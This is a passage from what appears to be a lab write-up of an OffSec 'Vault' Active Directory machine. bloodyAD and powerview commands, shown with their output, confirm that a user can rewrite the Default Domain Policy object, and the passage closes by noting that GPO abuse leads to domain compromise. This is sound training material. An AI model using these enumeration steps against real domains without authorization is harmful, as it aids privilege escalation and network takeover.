Group Policy Object
/Practice/Vault/3-Exploitation/attachments/{2A417BAE-2BA1-4CD1-B2B4-D0CB974D4EAD}.png)
During the BloodHound enumeration, it has been identified that the anirudh user has extensive rights, WriteDacl, WriteOwner, and GenericWrite,granted over the default domain policy object that has a complete control over the target domain.
Confirmation
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vault]
└─$ KRB5CCNAME=anirudh@dc.vault.offsec.ccache bloodyAD -d VAULT.OFFSEC -k --host dc.vault.offsec --dc-ip $IP get writable
distinguishedName: CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=vault,DC=offsec
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITE
distinguishedName: CN=User,CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=vault,DC=offsec
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITE
distinguishedName: CN=Machine,CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=vault,DC=offsec
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITE
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=vault,DC=offsec
permission: WRITE
distinguishedName: CN=Anirudh,CN=Users,DC=vault,DC=offsec
permission: WRITE
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vault]
└─$ KRB5CCNAME=anirudh@dc.vault.offsec.ccache powerview VAULT.OFFSEC/anirudh@dc.vault.offsec -k --no-pass --dc-ip $IP -q 'Get-ObjectAcl -SecurityIdentifier anirudh -ResolveGUIDs'
Logging directory is set to /home/kali/.powerview/logs/vault-anirudh-dc.vault.offsec
[2025-05-02 17:16:27] [Storage] Using cache directory: /home/kali/.powerview/storage/ldap_cache
[2025-05-02 17:16:27] User anirudh has adminCount attribute set to 1. Might be admin somewhere somehow :)
[2025-05-02 17:16:27] [Get-DomainObjectAcl] Recursing all domain objects. This might take a while
ObjectDN : CN=Machine,CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=vault,DC=offsec
ObjectSID : []
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
ActiveDirectoryRights : WriteOwner,WriteDACL,ReadControl,Delete,WriteProperties,ReadProperties,ListChildObjects,DeleteChild,CreateChild
AccessMask : WriteOwner,WriteDACL,ReadControl,Delete,WriteProperties,ReadProperties,ListChildObjects,DeleteChild,CreateChild
InheritanceType : None
SecurityIdentifier : VAULT\anirudh
ObjectDN : CN=User,CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=vault,DC=offsec
ObjectSID : []
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
ActiveDirectoryRights : WriteOwner,WriteDACL,ReadControl,Delete,WriteProperties,ReadProperties,ListChildObjects,DeleteChild,CreateChild
AccessMask : WriteOwner,WriteDACL,ReadControl,Delete,WriteProperties,ReadProperties,ListChildObjects,DeleteChild,CreateChild
InheritanceType : None
SecurityIdentifier : VAULT\anirudh
ObjectDN : CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=vault,DC=offsec
ObjectSID : []
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : CONTAINER_INHERIT_ACE
ActiveDirectoryRights : WriteOwner,WriteDACL,ReadControl,Delete,WriteProperties,ReadProperties,ListChildObjects,DeleteChild,CreateChild
AccessMask : WriteOwner,WriteDACL,ReadControl,Delete,WriteProperties,ReadProperties,ListChildObjects,DeleteChild,CreateChild
InheritanceType : None
SecurityIdentifier : VAULT\anirudhThis could be confirmed using both powerview and bloodyAD
They all points to the DN; CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=vault,DC=offsec
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vault]
└─$ KRB5CCNAME=anirudh@dc.vault.offsec.ccache powerview VAULT.OFFSEC/anirudh@dc.vault.offsec -k --no-pass --dc-ip $IP -q 'Get-DomainGPO -Identity 31B2F340-016D-11D2-945F-00C04FB984F9'
Logging directory is set to /home/kali/.powerview/logs/vault-anirudh-dc.vault.offsec
[2025-05-02 18:26:59] [Storage] Using cache directory: /home/kali/.powerview/storage/ldap_cache
[2025-05-02 18:26:59] User anirudh has adminCount attribute set to 1. Might be admin somewhere somehow :)
objectClass : top
container
groupPolicyContainer
cn : {31B2F340-016D-11D2-945F-00C04FB984F9}
distinguishedName : CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=vault,DC=offsec
instanceType : 4
whenCreated : 19/11/2021 08:50:33 (3 years, 5 months ago)
whenChanged : 19/11/2021 09:00:32 (3 years, 5 months ago)
displayName : Default Domain Policy
uSNCreated : 5672
uSNChanged : 12778
showInAdvancedViewOnly : TRUE
name : {31B2F340-016D-11D2-945F-00C04FB984F9}
objectGUID : {93130581-3375-49c7-88d3-afdc915a9526}
flags : 0
versionNumber : 4
systemFlags : -1946157056
objectCategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=vault,DC=offsec
isCriticalSystemObject : TRUE
gPCFunctionalityVersion : 2
gPCFileSysPath : \\vault.offsec\sysvol\vault.offsec\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
gPCMachineExtensionNames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}][{827D319E-6EAC-11D2-A
4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6
AB1B-2488-11D1-A28C-00C04FB94F17}]
dSCorePropagationData : 20211119090032.0Z
20211119085114.0Z
16010101000000.0ZQuerying for the CN, 31B2F340-016D-11D2-945F-00C04FB984F9, reveals that it is indeed the Default Domain Policy object
There are many tools out there that can be used to manipulate GPO, and it mostly leads to a complete domain compromise